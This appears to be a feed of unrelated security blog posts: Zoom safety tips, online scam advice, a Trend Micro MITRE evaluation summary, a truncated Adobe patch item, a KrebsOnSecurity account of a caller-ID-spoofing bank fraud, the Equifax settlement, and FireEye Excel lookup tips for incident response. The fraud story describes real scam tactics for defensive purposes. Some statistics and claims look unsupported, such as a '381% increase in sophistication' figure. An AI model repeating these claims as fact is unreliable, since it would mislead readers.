Responding to the massive number of complaints, Zoom did update its blog with some tips and tricks that might prove useful in fostering protection on Zoom, but there is still a lot of vagueness surrounding safety on Zoom. Zoombombing aside, a recent report revealed that Zoom’s data is being routed through Chinese web hosting servers.

Shockingly, the parliament of the United Kingdom has been using Zoom for sensitive meetings. A follow-up study by a web hosting reviews website based in London found that even if parliament used other video conferencing applications, much of the call data would be routed through international data centers.

In an attempt to aid our readers, and to clear most of the doubts that they might be harboring, we’ve compiled an article that dives deep into the safety aspect of the popular online conference calling application, along with some tips to boost security.

Do You Really Need to Worry About Your Privacy While Using Zoom?

A popular question that many individuals have been asking, is whether concerns over Zoom’s privacy policy are legitimate or not. After all, in the midst of the coronavirus pandemic, it’s safe to say that most of us have already got a lot to worry about, without having to stress over our private online meetings being sabotaged by an intruder.

Despite not wanting to pay heed to any worries other than the coronavirus right now, we believe that staying informed about the threats present on Zoom is critical to ensuring cybersecurity in the long run. Moreover, staying aware of the vulnerabilities present on Zoom can also help prevent you from becoming the victim of a cybercrime, which is almost certain to add to your worries.

With that out of the way, Zoom, unfortunately, just like every other web-based platform, has multiple entry points through which hackers and other cybercriminals can gain entry into a confidential online conference call. The greatest risk to users’ privacy is the fact that Zoom collects information, and permits other third parties to collect data on its users as well.

Bearing a striking resemblance to Facebook, Zoom’s privacy policy (which most of us don’t even bother to read) contains a clause granting the right to collect its users’ data, store it on any popular cloud storage provider, and share it with third parties. Typically, these third parties are advertisers, who now, through Zoom, have access to your information. It is also worth mentioning that Zoom’s right to collect data isn’t limited to users’ names, locations, and usage information, but extends to the content shared in the online calls as well, such as instant messages, files, whiteboards, etc.

Bearing witness to the vulnerable nature of Zoom’s privacy policy is the discovery of a software vulnerability that left millions of users’ videos exposed. Fortunately enough, Zoom was extremely robust in its effort to remedy the discovered vulnerability, and the issue has since been resolved.

Although the video vulnerability has been fixed, the tool that was used to identify the vulnerability can potentially allow anyone to manipulate a meeting code and gain entry into a confidential meeting. Along with the tool allowing access to a Zoom meeting, it has also been brought into light that malicious agents can rely on software to guess meeting ID numbers. Cybersecurity specialists have already devised a software program, called zWarDial, which can predict Zoom meeting IDs between nine and eleven digits.

Although zWarDial only identifies meeting IDs correctly with an accuracy of about 14%, that still amounts to around 100 meetings being compromised in the course of an hour. Once the program finds an active meeting, it can then go on to discover the meeting link, date, and time, along with other crucial details such as the meeting organizer and the meeting topic.

How Can You Stay Safe on Zoom?

Up till this point, we might have drilled in an image of Zoom as the harbinger of destruction to the cybersecurity infrastructure that we’ve already put up. Although that statement might be a tad bit (read: heavily) exaggerated, there’s a huge silver lining to look forward to.

Once you start taking security seriously and follow some simple steps, whether you’re hosting a Zoom meeting or attending one, you can navigate and make the most out of the popular online conferencing application.

Safety Measures to Take as a Host

  • Always be extremely cautious of the people that you’re sharing your public meeting link with. Try not to upload it on social platforms, which might result in untrustworthy individuals gaining access.
  • As a precautionary step, you can also set up a password for participants to validate their entry into the meeting.
  • Whilst screen sharing, make sure that you’re the only person in control by ensuring that “Host” is the only option selected from the “Who Can Share?” menu.
  • Set two-factor authentication, and remove any unwanted participants from the meeting.
  • Last, but certainly not least, if you encounter Zoombombing or any suspicious activity in your meeting, report it directly to Zoom.

Safety Measures to Take as a Meeting Attendee

  • To ensure that your data isn’t being shared with untrusted parties, ask whether your host is recording the call. You can also determine this by seeing if there’s a small red dot on the screen.
  • Ask your host as to their reasons for recording the call, and where your information is being stored. To ensure maximum security, recorded content should be stored on a secure server.
  • If you wish to protect your room’s privacy, try using a virtual background to prevent sharing unnecessary information about your personal space, such as the posters you’ve put up in your room, etc.
  • Ensure that your camera and microphone are turned off when you aren’t talking, so as to prevent unwanted attention to your actions and responses.

Parting Words

Amidst the COVID-19 pandemic, with a monumental number of people locked up in their homes looking for answers, the Zoom application has now become a staple tool for many. Not only does it allow us to socially distance while being social, but it also helps maintain some sense of normal life.


Having said that, however, users can significantly amp up their security on the online conferencing application simply by adhering to the safety steps that we’ve mentioned above!

The post Is Zoom Safe to Use? appeared first on .

How to Spot an Online Scam?

With the advent of ‘smart’ devices, which includes everything from self-driving cars, smart assistants such as Amazon’s Alexa to smart refrigerators, the modern-day internet continues to expand into the vast IoT, giving rise to a highly interconnected digital landscape.

On the surface, the interconnectivity offered by the IoT seems to be highly advantageous, and although that might be true to a certain extent, it also offers several entry points for cybercriminals to profit off of naive internet users.

Moreover, despite the 391,000,000 Google search results that come up when you type the words ‘online scams,’ for many individuals, there are still many doubts and uncertainties as far as online fraud is concerned, particularly in light of how easy it’s become to falsify reviews in Google and elsewhere.

For starters, the most basic mistake that the naive internet user is likely to make is to group all sorts of online scams and cybercrimes together, which results in the poor prioritization of threats. Along with the misunderstanding that all scams are created equal, the typical internet user is also unequipped with the means to identify subtler scams.

In an attempt to aid our readers in identifying an online scam while it is still in its initial stages, we’ve compiled an article that covers everything that you need to know about online scamming, along with tips to prevent them from happening, and steps that you can take in the instance you find yourself a victim of an online scam.

What Exactly is an “Online Scam”?

Up till this point, we’ve only skimmed over the details of what an online scam is. To put it quite simply, and as the name itself suggests, an online scam is a type of digital fraud. With rapid-paced advancements being made in email marketing, internet protocol technology, and web hosting performance, online scams have taken on an arsenal of forms, all of which are growing increasingly sophisticated.

How sophisticated, exactly? In a recent interview with Gary Stevens, founder of the Ottawa-based web hosting reviews website, Stevens said this: “Since 2016, we’ve seen a 381% increase in the sophistication of online scams routed through most Canadian web hosts. Not only are they increasing in frequency, but also in sophistication.”

Having said that, the pivotal focus of an online scam is to leverage an individual’s personal information for financial gains. Typically, the stolen confidential data is utilized by cybercriminals to trick people into giving them money.

Most online scams fall into one of the following categories:

The Email Money Scam

Perhaps the least sophisticated online scam out there, email money fraud schemes rely heavily on the naivete of their victims to fall into the hackers’ poorly constructed web of deceit.

One of the most common examples of the email money scam is the ‘Nigerian bank scam,’ which sends potential victims emails, or messages, which usually leads to some sort of advanced-fee fraud taking place. Fortunately, however, despite how persistent the Nigerian 419 scam is, one need only look out for the many red flags to avoid it.

The ‘Compromised’ Friend

One of the defining characteristics of an online scam is that they usually propagate in every aspect of an individual’s life, including friendships, which as it turns out, offer an excellent medium to further spread the scam.

We’ve all been in situations where we’ve received an urgent message on Facebook Messenger from a distant relative, or acquaintance expressing a grave situation that they’ve landed themselves in, and how they need financial help from you. Unlike the email money scam, people are more likely to fall for a message from a compromised friend, since they think that they’re helping an acquaintance in need.

The Tailor-Made Problem

As technology steers itself forward at lightning pace, cybercriminals all over the place have taken to creating increasingly sophisticated and complex scamming schemes. One such example is when online scammers scour your social media platforms, along with the sensitive information that they’ve stolen, to create a specific problem in an attempt to coerce an immediate payment. Typically, the problem may involve a family emergency or an alleged debt that needs to be paid off immediately.

Why Do Individuals Fall for Online Scams?

From what we’ve described so far, some of our more cynical readers might be wondering why people fall for online scams in the first place. Some of them, such as the Nigerian 419 scams, have several tell-tale signs that make avoiding the scam a piece of cake.

Despite the multiple red flags that an online scam might display, individuals fall prey to online fraud schemes, simply because these scams are designed in a way that enables cybercriminals to prey on the natural human inclination to seek gain.

Simply put, an online scam works because it targets individuals’ emotions rather than their logic. For an online scammer, the task is quite simple: all they have to do is come up with an offer that is too good to be true, or a situation that leverages someone’s weakness, and make money off of it.

In addition to preying on our innate human tendency to seek gain and avoid loss, these online scams also target the instinctive choices that we make. One of the most common examples of this is the fear of missing out, where we’re promised a huge reward but only if we act instantaneously. Similarly, there’s loss aversion, which has an individual act quickly to avoid facing bigger losses later.

How Do Online Scammers Discover Their Victims?

As is the case with most scams, whether they be online or not, scammers rely on an arsenal of ways to wreak damage on their victims. Some of the most popular ways through which online scammers lure their victims include the following:

Email Phishing

The most common way through which online scammers launch their deceiving schemes is through email phishing. Phishing refers to cybercriminals sending emails containing a malicious link to a fraudulent website, which is typically disguised as a banking or e-commerce site, which tricks the victims into giving their financial details.

Mobile Phishing

Similar to email phishing, mobile phishing focuses on getting potential victims to download malware on their mobile devices. The malware then works in the background, to snoop around and collect sensitive information of the victim, including financial details.

Fake Software

Another popular way for cybercriminals to launch their online scams is through fake software, which is also referred to as scareware. While browsing, potential victims receive a pop-up window indicating that their device has been infected with a virus. Once users click on a link to remove the infection, the scareware installs malware on their device, which allows the scammer to harvest confidential information for their monetary gains.

Social Media

Sometimes, popular social media platforms can also house online scams that encourage users to click on a malicious link. Furthermore, since people are very forthcoming with their personal information on social media platforms, they can also be highly susceptible to identity theft and socially engineered scams.

Can Online Scams Be Avoided?

Despite seeing a spike in both popularity and complexity, individuals can still avoid online scams, by taking a couple of simple steps, which consist of the following:

  • Try to stay away from posting personal information on your social media accounts. Although the temptation to post about our achievements might be too strong, we’d recommend that you don’t provide cybercriminals with a data source to launch socially engineered attacks, and scams on you in the future.
  • Avoid clicking on any unexpected links, which includes pop-up windows, and any ‘shady’ links present within the body of an email that you’ve received.
  • If you’re stuck in a situation where the other party is pressuring you for immediate payment, we’d highly suggest that you ask them for documentation to confirm their legitimacy.
  • The last one on our list shouldn’t even be here, but unfortunately, there have been several cases of people giving their passwords to strangers online. The basic rule that you need to engrave on to your hearts, is to never, under any circumstance, give your password to people!

What Steps Can You Take Once You’ve Fallen Prey to An Online Scam?

In the unfortunate instance that you’ve fallen victim to an online fraud scheme, the first and foremost step that you need to take is to report the scam.

We’d suggest that you report it to a legitimate organization such as the FTC or the Internet Crime Complaint Center (IC3). They may be able to point you toward reputable data recovery services, but it’s hard to say whether or not they will be able to fix all the damage that’s been done.

Moreover, if you notice any suspicious credit/debit card transactions, contact your bank and ask them to reverse any fraudulent charges.

In cases where you suspect that your devices have been infected with malware, run antivirus and antimalware software, and change all your passwords to protect any further sensitive information from being compromised.

Last but certainly not least, notify all your friends and family about the scam, so as to prevent the scam from propagating any further than it already has.



At the end of the article, we can only hope that we’ve gotten the basics of spotting an online scam down for our readers. As scammers employ a variety of complex techniques to deceive innocent people, we’d like our readers to realize the significance of taking their privacy seriously, and taking the aforementioned steps to stay safe online!

The post How to Spot an Online Scam? appeared first on .

Trend Micro’s Top Ten MITRE Evaluation Considerations

The introduction of the MITRE ATT&CK evaluations is a welcomed addition to the third-party testing arena. The ATT&CK framework, and the evaluations in particular, have gone such a long way in helping advance the security industry as a whole, and the individual security products serving the market.

The insight garnered from these evaluations is incredibly useful. But let’s admit, for everyone except those steeped in the analysis, it can be hard to understand. The information is valuable, but dense. There are multiple ways to look at the data and even more ways to interpret and present the results (as no doubt you’ve already come to realize after reading all the vendor blogs and industry articles!). We have been looking at the data for the past week since it was published, and still have more to examine over the coming days and weeks.

The more we assess the information, the clearer the story becomes, so we wanted to share with you Trend Micro’s 10 key takeaways for our results:

1. Looking at the results of the first run of the evaluation is important:

  • Trend Micro ranked first in initial overall detection. We are the leader in detections based on initial product configurations. This evaluation enabled vendors to make product adjustments after a first run of the test to boost detection rates on a re-test. The MITRE results show the final results after all product changes. If you assess what the product could detect as originally provided, we had the best detection coverage among the pool of 21 vendors.
  • This is important to consider because product adjustments can vary in significance and may or may not be immediately available in vendors’ current product. We also believe it is easier to do better, once you know what the attacker was doing – in the real world, customers don’t get a second try against an attack.
  • Having said that, we too took advantage of the retest opportunity since it allows us to identify product improvements, but our overall detections were so high, that even removing those associated with a configuration change, we still ranked first overall.

  • And so no one thinks we are just spinning… without making any kind of exclusions to the data at all, and just taking the MITRE results in their entirety, Trend Micro had the second highest detection rate, with 91+% detection coverage.

2. There is a hierarchy in the type of main detections – Techniques is most significant

  • There is a natural hierarchy in the value of the different types of main detections.
    • A general detection indicates that something was deemed suspicious but it was not assigned to a specific tactic or technique.
    • A detection on tactic means the detection can be attributed to a tactical goal (e.g. credential access).
    • Finally, a detection on technique means the detection can be attributed to a specific adversarial action (e.g. credential dumping).
  • We have strong detection on techniques, which is a better detection measure. With the individual MITRE technique identified, the associated tactic can be determined, as typically, there are only a handful of tactics that would apply to a specific technique. When comparing results, you can see that vendors had lower tactic detections on the whole, demonstrating a general acknowledgement of where the priority should lie.
  • Likewise, the fact that we had lower general detections compared to technique detections is a positive. General detections are typically associated with a signature; as such, this proves that we have a low reliance on AV.
  • It is also important to note that we did well in telemetry which gives security analysts access to the type and depth of visibility they need when looking into detailed attacker activity across assets. 

3. More alerts does not equal better alerting – quite the opposite

  • At first glance, some may expect one should have the same number of alerts as detections. But not all detections are created equal, and not everything should have an alert (remember, these detections are for low level attack steps, not for separate attacks.)
  • Too many alerts can lead to alert fatigue and add to the difficulty of sorting through the noise to what is most important.
  • When you consider the alerts associated with our higher-fidelity detections (e.g. detection on technique), you can see that the results show that Trend Micro did very well at reducing the noise of all of the detections into a minimal volume of meaningful/actionable alerts.

4. Managed Service detections are not exclusive

  • Our MDR analysts contributed to the “delayed detection” category. This is where the detection involved human action and may not have been initiated automatically.
  • Our results show the strength of our MDR service as one way for detection and enrichment. If an MDR service was included in this evaluation, we believe you would want to see it provide good coverage, as it demonstrates that the team is able to detect based on the telemetry collected.
  • What is important to note though is that the numbers for the delayed detection don’t necessarily mean it was the only way a detection was/could be made; the same detection could be identified by other means. There are overlaps between detection categories.
  • Our detection coverage results would have remained strong without this human involvement – approximately 86% detection coverage (with MDR, it boosted it up to 91%).

5. Let’s not forget about the effectiveness and need for blocking!

  • This MITRE evaluation did not test for a product’s ability to block/protect from an attack, but rather exclusively looks at how effective a product is at detecting an event that has happened, so there is no measure of prevention efficacy included.
  • This is significant for Trend, as our philosophy is to block and prevent as much as you can so customers have less to clean up/mitigate.

6. We need to look through more than the Windows

  • This evaluation looked at Windows endpoints and servers only; it did not look at Linux for example, where of course Trend has a great deal of strength in capability.
  • We look forward to the expansion of the operating systems in scope. MITRE has already announced that the next round will include a Linux system.

7. The evaluation shows where our product is going

  • We believe the first priority for this evaluation is the main detections (for example, detecting on techniques as discussed above). Correlation falls into the modifier detection category, which looks at what happens above and beyond an initial detection.
  • We are happy with our main detections, and see great opportunity to boost our correlation capabilities with Trend Micro XDR, which we have been investing in heavily and is at the core of the capabilities we will be delivering in product to customers as of late June 2020.
  • This evaluation did not assess our correlation across email security; so there is correlation value we can deliver to customers beyond what is represented here.

8. This evaluation is helping us make our product better

  • The insight this evaluation has provided us has been invaluable; it has helped us identify areas for improvement, and we have initiated product updates as a result.
  • As well, having a product with a “detection only” mode option helps augment the SOC intel, so our participation in this evaluation has enabled us to make our product even more flexible to configure; and therefore, a more powerful tool for the SOC.
  • While some vendors try to use it against us, our extra detections after config change show that we can adapt to the changing threat landscape quickly when needed.

9. MITRE is more than the evaluation

  • While the evaluation is useful, it is important to recognize MITRE ATT&CK as a knowledge base that the security industry can both align to and contribute to.
  • Having a common language and framework to better explain how adversaries behave, what they are trying to do, and how they are trying to do it, makes the entire industry more powerful.
  • Among the many things we do with or around MITRE, Trend has contributed and continues to contribute new techniques to the framework matrices, and uses ATT&CK within our products as a common language for alerts, detection descriptions and search parameters.

10. It is hard not to get confused by the FUD!

  • MITRE does not score, rank or provide side by side comparison of products, so unlike other tests or industry analyst reports, there is no set of “leaders” identified.
  • As this evaluation assesses multiple factors, there are many different ways to view, interpret and present the results (as we did here in this blog).
  • It is important that individual organizations understand the framework, the evaluation, and most importantly what their own priorities and needs are, as this is the only way to map the results to the individual use cases.
  • Look to your vendors to help explain the results, in the context that makes sense for you. It should be our responsibility to help educate, not exploit.


Critical Security Patches Released for Magento, Adobe Illustrator and Bridge

It's not 'Patch Tuesday,' but software giant Adobe today released emergency updates for three of its widely used products that patch dozens of newly discovered critical vulnerabilities. The list of affected software includes Adobe Illustrator, Adobe Bridge, and Magento e-commerce platform, containing a total of 35 vulnerabilities where each one of them is affected with multiple critical

Would You Have Fallen for This Phone Scam?

You may have heard that today’s phone fraudsters like to use caller ID spoofing services to make their scam calls seem more believable. But you probably didn’t know that these fraudsters also can use caller ID spoofing to trick your bank into giving up information about recent transactions on your account — data that can then be abused to make their phone scams more believable and expose you to additional forms of identity theft.

Last week, KrebsOnSecurity told the harrowing tale of a reader (a security expert, no less) who tried to turn the tables on his telephonic tormentors and failed spectacularly. In that episode, the people impersonating his bank not only spoofed the bank’s real phone number, but they were also pretending to be him on a separate call at the same time with his bank.

This foiled his efforts to make sure it was really his bank that called him, because he called his bank with another phone and the bank confirmed they currently were in a separate call with him discussing fraud on his account (however, the other call was the fraudster pretending to be him).

Shortly after that story ran, I heard from another reader — we’ll call him “Jim” since he didn’t want his real name used for this story — whose wife was the target of a similar scam, albeit with an important twist: The scammers were armed with information about a number of her recent financial transactions, which he claims they got from the bank’s own automated phone system just by spoofing her phone number.

“When they originally called my wife, there were no fraudulent transactions on her account, but they were able to specify the last three transactions she had made, which combined with the caller-ID had mistakenly earned her trust,” Jim explained. “After we figured out what was going on, we were left asking ourselves how the crooks had obtained her last three transactions without breaking into her account online. As it turned out, calling the phone number on the back of the credit card from the phone number linked with the card provided the most recent transactions without providing any form of authentication.”

Jim said he was so aghast at this realization that he called the same number from his phone and tried accessing his account, which is also at Citi but wholly separate from his spouse’s. Sure enough, he said, as long as he was calling from the number on file for his account, the automated system let him review recent transactions without any further authentication.

“I confirmed on my separate Citi card that they often (but not quite always) were providing the transaction details,” Jim said. “I was appalled that Citi would do that. So, it seemed the crooks would spoof caller ID when calling Citibank, as well as when calling the target/victim.”

The incident Jim described happened in late January 2020, and Citi may have changed its procedures since then. But in a phone interview with KrebsOnSecurity earlier this week, Jim made a call to Citi’s automated system from his mobile phone on file with the bank, and I could hear Citi’s systems asking him to enter the last four digits of his credit card number before he could review recent transactions.

The request for the last four of the customer’s credit card number was consistent with my own testing, which relied on a caller ID spoofing service advertised in the cybercrime underground and aimed at a Citi account controlled by this author.

In one test, the spoofed call let KrebsOnSecurity hear recent transaction data — where and when the transaction was made, and how much was spent — after providing the automated system the last four digits of the account’s credit card number. In another test, the automated system asked for the account holder’s full Social Security number.

Citi declined to discuss specific actions it takes to detect and prevent fraud. But in a written statement provided to this author it said the company continuously monitors and analyzes threats and looks for opportunities to strengthen its controls.

“We see regular attempts by fraudsters to gain access to information and we are constantly monitoring for emerging threats and taking preventive action for our clients’ protection,” the statement reads. “For inbound calls to call centers, we continue to adapt and implement detection capabilities to identify suspicious or spoofed phone numbers. We also encourage clients to install and use our mobile app and sign up for push notifications and alerts in the mobile app.”


Jim said the fraudster who called his wife clearly already knew her mailing and email addresses, her mobile number and the fact that her card was an American Airlines-branded Citi card. The caller said there had been a series of suspicious transactions, and proceeded to read back details of several recent transactions to verify if those were purchases she’d authorized.

A list of services offered by one of several underground stores that sell caller ID spoofing and email bombing services.

Jim’s wife quickly logged on to her Citi account and saw that the amounts, dates and places of the transactions referenced by the caller indeed corresponded to recent legitimate transactions. But she didn’t see any signs of unauthorized charges.

After verifying the recent legitimate transactions with the caller, the person on the phone asked for her security word. When she provided it, there was a long hold before the caller came back and said she’d provided the wrong answer.

When she corrected herself and provided a different security word, there was another long pause before the caller said the second answer she provided was correct. At that point, the caller said Citi would be sending her a new card and that it had prevented several phony charges from even posting to her account.

She didn’t understand until later that the pauses were points at which the fraudsters had to put her on hold to relay her answers in their own call posing as her to Citi’s customer service department.

Not long after Jim’s spouse hung up with the caller, her inbox quickly began filling up with hundreds of automated messages from various websites trying to confirm an email newsletter subscription she’d supposedly requested.

As the recipient of several of these “email bombing” attacks, I can verify that crooks often will use services offered in the cybercrime underground to flood a target’s inbox with these junk newsletter subscriptions shortly after committing fraud in the target’s name when they wish to bury an email notification from a target’s bank.


In the case of Jim’s wife, the inbox flood backfired, and only made her more suspicious about the true nature of the recent phone call. So she called the number on the back of her Citi card and was told that she had indeed just called Citi and requested what’s known as an “overpayment reimbursement.” The couple have long had their credit cards on auto-payment, and the most recent payment was especially high — nearly $4,000 — thanks to a flurry of Christmas present purchases for friends and family.

In an overpayment reimbursement, a customer can request that the bank refund any amount paid toward a previous bill that exceeds the minimum required monthly payment. Doing so causes any back-due interest on that unpaid amount to accrue to the account as well.

In this case, the caller posing as Jim’s wife requested an overpayment reimbursement to the tune of just under $4,000. It’s not clear how or where the fraudsters intended this payment to be sent, but for whatever reason Citi ended up saying they would cut a physical check and mail it to the address on file. Probably not what the fraudsters wanted, although since then Jim and his wife say they have been on alert for anyone suspicious lurking near their mailbox.

“The person we spoke with at Citi’s fraud department kept insisting that yes, it was my wife that called because the call came from her mobile number,” Jim said. “The Citi employee was alarmed because she didn’t understand the whole notion of caller ID spoofing. And we both found it kind of disturbing that someone in fraud at such a major bank didn’t even understand that such a thing was possible.”


Fraud experts say the scammers behind the types of calls that targeted Jim’s family are most likely fueled by the rampant sale of credit card records stolen from hacked online merchants. This data, known as “CVVs” in the cybercrime underground, is sold in packages for about $15 to $20 per record, and very often includes the customer’s name, address, phone number, email address and full credit or debit card number, expiration date, and card verification value (CVV) printed on the back of the card.

A screen shot from an underground store selling CVV records. Note that all of these records come with the cardholder’s address, email, phone number and zip code. Click to enlarge. Image: Gemini Advisory.

Dozens of cybercrime shops traffic in this stolen data, which is more traditionally used to defraud online merchants. But such records are ideally suited for criminals engaged in the type of phone scams that are the subject of this article.

That’s according to Andrei Barysevich, CEO and co-founder of Gemini Advisory, a New York-based company that monitors dozens of underground shops selling stolen card data.

“If the fraudsters already have the target’s cell phone number, in many cases they already have the target’s credit card information as well,” Barysevich said.

Gemini estimates there are currently some 13 million CVV records for sale across the dark web, and that more than 40 percent of these records put up for sale over the past year included the cardholder’s phone number.

Data from recent financial transactions can not only help fraudsters better impersonate your bank, it can also be useful in linking a customer’s account to another account the fraudsters control. That’s because PayPal and a number of other pure-play online financial institutions allow customers to link accounts by verifying the value of microdeposits.

For example, if you wish to be able to transfer funds between PayPal and a bank account, the company will first send a couple of tiny deposits — a few cents, usually — to the account you wish to link. Only after verifying those exact amounts will the account-linking request be granted.


Both this and last week’s story illustrate why the only sane response to a call purporting to be from your bank is to hang up, look up your bank’s customer service number from their Web site or from the back of your card, and call them back yourself.

Meanwhile, fraudsters who hack peoples’ finances with nothing more than a telephone have been significantly upping the volume of attacks in recent months, new research suggests. Fraud prevention company Next Caller said this week it has tracked “massive increases in call volumes and high-risk calls across Fortune 500 companies as a result of COVID-19.”

Image: Next Caller.

“After a brief reprieve in Week 4 (April 6-12), Week 5 (April 13-19) saw call volume across Next Caller’s clients in the telecom and financial services sectors spike 40% above previous highs,” the company found. “Particularly worrisome is the activity taking place in the financial services sector, where call traffic topped previous highs by 800%.”

Next Caller said it’s likely some of that increase was due to numerous online and mobile app outages for many major financial institutions at a time when more than 80 million Americans were simultaneously trying to track the status of their stimulus deposits. But it said that surge also brought with it an influx of fraudsters looking to capitalize on all the chaos.

“High-risk calls to financial services surged to 50% above pre-COVID levels, with one Fortune 100 bank suffering a high-risk increase of 60% during Week 5,” the company wrote in a recent report.

Massachusetts to Receive $18.2 Million in Settlement Against Equifax

On April 17, 2020, the Massachusetts Attorney General, Maura Healey, announced that Massachusetts will receive a payout of $18.2 million in the settlement against Equifax Inc. The settlement, which was approved in a judgment on April 13, 2020, is in response to the 2017 data breach in which attackers hacked Equifax and gained unauthorized access to the personal information, including Social Security numbers and driver’s license numbers, of over 147 million U.S. individuals, 3 million of whom were Massachusetts residents.

The plaintiff, in this case the Commonwealth of Massachusetts, argued that the defendant, Equifax, knew of the vulnerability in its network but failed to take the necessary measures to prevent a breach. It was also argued that Equifax, after realizing that consumer data was hacked, failed to report the breach in a timely manner.

Aside from the monetary payout, the settlement also requires Equifax to improve its security practices and meet Massachusetts compliance regulations, including identifying critical security updates, minimizing its data collection, maintaining up-to-date software, and consenting to third-party assessments of its practices.

The funds will be used for state needs and for local consumer groups to assist customers. Massachusetts residents affected by the breach will not be compensated from the payout but can seek relief from the global settlement between Equifax and the Federal Trade Commission which was settled in 2019.

What this settlement means for your businesses

Data breaches are becoming more prevalent and more dire. In fact, according to Kaspersky Labs, 46 percent of large businesses worldwide have already had one or more data breaches. And these data breaches affect everyone involved: businesses face lawsuits, employees face terminations, and consumers lose peace of mind.

Judges are not, and will not, cut slack for businesses that do not take the necessary actions to protect consumer data. In fact, following the Equifax settlement, Maura Healey stated that this is “one of the largest penalties ever paid to a single state over a data breach.” So now is the time to get serious about your application security and to show your customers that you are prioritizing their wellbeing.

One way to make sure that you have the proper security in place is to have a third-party assess and certify your applications. In a recent IDG survey report, Security as a Competitive Advantage, 66 percent of respondents stated that they would be more likely to work with a certified vendor. By undergoing an unbiased assessment, you can boost customer confidence, prevent future losses, and gain a competitive advantage.

At Veracode, we offer a step-by-step plan to become certifiably secure. Learn more about our program, Veracode Verified, and become a trusted vendor, today.


Excelerating Analysis, Part 2 — X[LOOKUP] Gon’ Pivot To Ya

In December 2019, we published a blog post on augmenting analysis using Microsoft Excel for various data sets for incident response investigations. As we described, investigations often include custom or proprietary log formats and miscellaneous, non-traditional forensic artifacts. There are, of course, a variety of ways to tackle this task, but Excel stands out as a reliable way to analyze and transform a majority of data sets we encounter.

In our first post, we discussed summarizing verbose artifacts using the CONCAT function, converting timestamps using the TIME function, and using the COUNTIF function for log baselining. In this post, we will cover two additional versatile features of Excel: LOOKUP functions and PivotTables.

For this scenario, we will use a dataset of logon events for an example Microsoft Office 365 (O365) instance to demonstrate how an analyst can enrich information in the dataset. Then we will demonstrate some examples of how to use PivotTables to summarize information and highlight anomalies in the data quickly.

Our data contains the following columns:

  • Description – Event description
  • User – User’s name
  • User Principal Name – email address
  • App – such as Office 365, Sharepoint, etc.
  • Location – Country
  • Date
  • IP address
  • User agent (simplified)
  • Organization – associated with IP address (as identified by O365)

Figure 1: O365 data set

LOOKUP for Data Enrichment

It may be useful to add more information to the data that could help us in analysis that isn’t provided by the original log source. A step FireEye Mandiant often performs during investigations is to take all unique IP addresses and query threat intelligence sources for each IP address for reputation, WHOIS information, connections to known threat actor activity, etc. This grants more information about each IP address that we can take into consideration in our analysis.

While FireEye Mandiant is privy to historical engagement data and Mandiant Threat Intelligence, if security teams or organizations do not have access to commercial threat intelligence feeds, there are numerous open source intelligence services that can be leveraged.

We can also use IP address geolocation services to obtain latitude and longitude related to each source IP address. This information may be useful in identifying anomalous logons based on geographical location.

After taking all source IP addresses, running them against threat intelligence feeds and geolocating them, we have the following data added to a second sheet called “IP Address Intel” in our Excel document:

Figure 2: IP address enrichment

We can already see before we even dive into the logs themselves that we have suspicious activity: The five IP addresses in the range in our data are known to be associated with activity connected to a fictional threat actor tracked as TMP.OGRE.

To enrich our original dataset, we will add three columns to our data to integrate the supplementary information: “Latitude,” “Longitude,” and “Threat Intel” (Figure 3). We can use the VLOOKUP or XLOOKUP functions to quickly retrieve the supplementary data and integrate it into our main O365 log sheet.

Figure 3: Enrichment columns


The traditional way to look up particular data in another array is by using the VLOOKUP function. We will use the following formula to reference the “Latitude” values for a given IP address:

Figure 4: VLOOKUP formula for Latitude

There are four parts to this formula:

  1. Value to look up:
    • This dictates what cell value we are going to look up more information for. In this case, it is cell G2, which is the IP address.
  2. Table array:
    • This defines the entire array in which we will look up our value and return data from. The first column in the array must contain the value being looked up. In the aforementioned example, we are searching in 'IP Address Intel'!$A$2:$D$15. In other words, we are looking in the other sheet in this workbook we created earlier titled “IP Address Intel”, then in that sheet, search in the cell range of A2 to D15.

      Figure 5: VLOOKUP table array

      Note the use of the “$” to ensure these are absolute references and will not be updated by Excel if we copy this formula to other cells.
  3. Column index number:
    • This identifies the column number from which to return data. The first column is considered column 1. We want to return the “Latitude” value for the given IP address, so in the aforementioned example, we tell Excel to return data from column 2.
  4. Range lookup (match type)
    • This part of the formula tells Excel what type of matching to perform on the value being looked up. Excel defaults to “Approximate” matching, which assumes the data is sorted and will match the closest value. We want to perform “Exact” matching, so we put “0” here (“FALSE” is also accepted).

With the VLOOKUP function complete for the “Latitude” data, we can use the fill handle to update this field for the rest of the data set.

To get the values for the “Longitude” and “Threat Intel” columns, we repeat the process by using a similar function and, adjusting the column index number to reference the appropriate columns, then use the fill handle to fill in the rest of the column in our O365 data sheet:

  • For Longitude:
    • =VLOOKUP(G2,'IP Address Intel'!$A$2:$D$15,3,0)
  • For Threat Intel:
    • =VLOOKUP(G2,'IP Address Intel'!$A$2:$D$15,4,0)

Bonus Option: XLOOKUP

The XLOOKUP function in Excel is a more efficient way to reference the threat intelligence data sheet. XLOOKUP is a newer function introduced to Excel to replace the legacy VLOOKUP function and, at the time of writing this post, is only available to “O365 subscribers in the Monthly channel”, according to Microsoft. In this instance, we will also leverage Excel’s dynamic arrays and “spilling” to fill in this data more efficiently, instead of making an XLOOKUP function for each column.

NOTE: To utilize dynamic arrays and spilling, the data we are seeking to enrich cannot be in the form of a “Table” object. Instead, we will apply filters to the top row of our O365 data set by selecting the “Filter” option under “Sort & Filter” in the “Home” ribbon:

Figure 6: Filter option

To reference the threat intelligence data sheet using XLOOKUP, we will use the following formula:

Figure 7: XLOOKUP function for enrichment

There are three parts to this XLOOKUP formula:

  1. Value to lookup:
    • This dictates what cell value we are going to look up more information for. In this case, it is cell G2, which is the IP address.
  2. Array to look in:
    • This will be the array of data in which Excel will search for the value to look up. Excel does exact matching by default for XLOOKUP. In the aforementioned example, we are searching in 'IP Address Intel'!$A$2:$A$15. In other words, we are looking in the other sheet in this workbook titled “IP Address Intel”, then in that sheet, search in the cell range of A2 to A15:

      Figure 8: XLOOKUP array to look in

      Note the use of the “$” to ensure these are absolute references and will not be updated by Excel if we copy this formula to other cells.
  3. Array of data to return:
    • This part will be the array of data from which Excel will return data. In this case, Excel will return the data contained within the absolute range of B2 to D15 from the “IP Address Intel” sheet for the value that was looked up. In the aforementioned example formula, it will return the values in the row for the IP address being looked up.

      Figure 9: Data to be returned from ‘IP Address Intel’ sheet

      Because this is leveraging dynamic arrays and spilling, all three cells of the returned data will populate, as seen in Figure 4.

